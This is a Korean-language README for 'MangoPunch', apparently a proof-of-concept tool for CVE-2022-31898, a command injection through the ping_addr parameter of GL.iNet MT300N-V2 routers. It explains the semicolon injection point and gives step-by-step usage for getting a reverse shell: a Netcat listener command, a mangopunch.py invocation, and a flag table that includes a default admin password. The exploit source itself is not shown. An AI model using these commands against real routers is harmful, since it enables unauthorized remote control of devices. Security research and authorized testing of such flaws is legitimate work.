
인증된 명령 주입 도구 (CVE-2022-31898) - HACKCONRD 2026.
__ __ _____ _
| \/ | | __ \ | |
| \ / | __ _ _ __ __ _ ___ | |__) | _ _ __ ___| |__
| |\/| |/ _` | '_ \ / _` |/ _ \| ___/ | | | '_ \ / __| '_ \
| | | | (_| | | | | (_| | (_) | | | |_| | | | | (__| | | |
|_| |_|\__,_|_| |_|\__, |\___/|_| \__,_|_| |_|\___|_| |_|
__/ |
|___/
이 저장소는 펌웨어 버전 3.215 미만의 GL.iNet MT300N-V2 (Mango) 및 기타 모델에서 발견된 원격 명령 실행(RCE) 취약점에 대한 기술적 개념 증명(PoC)을 포함하고 있습니다.
해당 결함은 진단 API의 ping_addr 매개변수에 존재하며, 인증된 공격자가 셸 메타문자(;)를 통해 임의 시스템 명령을 실행할 수 있게 합니다.
공격자 머신(Kali Linux)에서 터미널을 열고 Netcat 리스너를 시작합니다:
nc -lvnp 9292
다음 명령을 사용하여 리버스 셸을 트리거합니다:
python3 mangopunch.py -R <TARGET_IP> -L <YOUR_IP> -l <YOUR_LISTERNER_PORT> -p <PASSWORD>
| 플래그 | 전체 이름 | 설명 | 기본값 |
|---|---|---|---|
-R | --rhost | 원격 대상 IP (라우터) | 필수 |
-P | --rport | 웹 관리 포트 | 443 |
-L | --lhost | 리스너 IP (Kali/공격자) | 필수 |
-l | --lport | 리스너 포트 | 필수 |
-p | --pwd | 관리자 비밀번호 | goodlife |
-t | --https | HTTPS 활성화 | False |
면책 조항: 이 도구는 교육 및 승인된 보안 테스트 목적으로만 사용됩니다. 작성자는 오용에 대해 책임을 지지 않습니다. MangoPunch: CVE-2022-31898